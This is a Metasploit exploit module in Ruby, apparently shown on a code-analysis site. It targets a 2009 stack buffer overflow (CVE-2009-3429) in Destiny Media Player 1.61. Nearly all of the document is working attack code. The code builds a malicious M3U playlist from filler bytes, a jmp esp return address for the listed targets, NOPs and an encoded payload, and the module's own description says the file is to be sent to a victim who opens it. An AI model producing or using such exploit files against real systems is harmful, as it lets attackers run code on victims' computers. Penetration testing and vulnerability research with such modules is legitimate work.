rapid7/metasploit-framework

View on GitHub
modules/exploits/windows/fileformat/destinymediaplayer16.rb

Summary

Maintainability
A
1 hr
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Destiny Media Player 1.61 PLS M3U Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61.
          An attacker must send the file to victim and the victim must open the file. File-->Open Playlist
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Trancek <trancek[at]yashira.org>' ],
      'References'     =>
        [
          [ 'CVE', '2009-3429' ],
          [ 'OSVDB', '53249' ],
          [ 'EDB', '7651' ],
          [ 'BID', '33091' ]
        ],
      'Payload'        =>
        {
          'Space'    => 800,
          'BadChars' => "\x00\x0a\x0d\x3c\x22\x3e\x3d",
          'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
          'StackAdjustment' => -3500,
        },
      'DefaultOptions' =>
        {
          'AllowWin32SEH' => true
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          # Tested ok aushack 20090503
          [ 'Destiny Universal', { 'Ret' => 0x00bf9d4d } ], #jmp esp Destiny.exe
          [ 'Windows XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], #jmp esp
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2009-01-03',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'exploit_destiny.m3u']),
      ])

  end

  def exploit

    filepls = rand_text_alpha_upper(2052)
    filepls << [target.ret].pack('V')
    filepls << make_nops(10)
    filepls << payload.encoded
    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(filepls)

  end
end